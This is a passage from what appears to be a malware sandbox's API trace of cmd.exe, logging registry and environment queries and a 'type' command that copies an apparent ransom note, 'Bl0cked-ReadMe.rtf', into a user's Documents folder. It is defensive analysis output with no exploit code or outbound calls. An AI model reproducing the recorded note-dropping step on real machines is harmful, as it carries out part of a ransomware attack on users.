AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.278] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x290000, AllocationBase=0x290000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.278] GetConsoleOutputCP () returned 0x1b5 [0140.278] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.278] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.278] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.278] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.279] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.279] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.279] GetEnvironmentStringsW () returned 0x400180* [0140.279] FreeEnvironmentStringsW (penv=0x400180) returned 1 [0140.279] GetEnvironmentStringsW () returned 0x400180* [0140.279] FreeEnvironmentStringsW (penv=0x400180) returned 1 [0140.279] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0140.279] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0xa8, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.279] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegCloseKey (hKey=0x40) returned 0x0 [0140.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, 
lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0140.280] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0140.280] RegCloseKey (hKey=0x40) returned 0x0 [0140.280] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.280] srand (_Seed=0x5b88636e) [0140.280] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0140.280] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0140.281] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.281] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.281] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.281] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.281] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.281] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.281] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.281] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.281] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.282] GetEnvironmentStringsW () returned 0x4022d0* [0140.282] FreeEnvironmentStringsW (penv=0x4022d0) returned 1 [0140.282] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.282] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.282] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.282] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.282] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.282] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0140.282] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.282] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.282] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4b0, lpFilePart=0x28f4ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4ac*="Desktop") returned 0x18 [0140.282] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.282] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.282] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.283] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x400010 [0140.283] FindClose (in: hFindFile=0x400010 | out: hFindFile=0x400010) returned 1 [0140.283] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.283] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.283] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.283] GetEnvironmentStringsW () returned 0x402af0* [0140.283] FreeEnvironmentStringsW (penv=0x402af0) returned 1 [0140.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.284] GetConsoleOutputCP () returned 0x1b5 [0140.284] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.284] GetUserDefaultLCID () returned 0x409 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="1") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.285] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.286] GetConsoleTitleW (in: lpConsoleTitle=0x3f08e0, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.286] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.287] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.287] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.288] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.288] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.288] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.288] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.288] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.288] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.292] GetFileType (hFile=0x7) returned 0x2 [0140.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f4e8 | out: lpMode=0x28f4e8) returned 1 [0140.872] _dup (_FileHandle=1) returned 3 [0140.872] _close (_FileHandle=1) returned 0 [0140.873] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.873] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.873] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.873] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.873] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.873] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.873] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.873] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.874] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28ee4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ee4c) returned 0x3f0e70 [0140.874] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.874] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.874] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.874] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28dd58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.874] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.874] GetFileType (hFile=0x54) returned 0x1 [0140.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28ddb0 | out: lpFileSizeHigh=0x28ddb0*=0x0) returned 0x1632 [0140.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] 
ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] GetFileType (hFile=0x4c) returned 0x1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] GetFileType (hFile=0x4c) returned 0x1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 
[0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.877] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.877] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, 
lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, 
lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.878] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.878] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, 
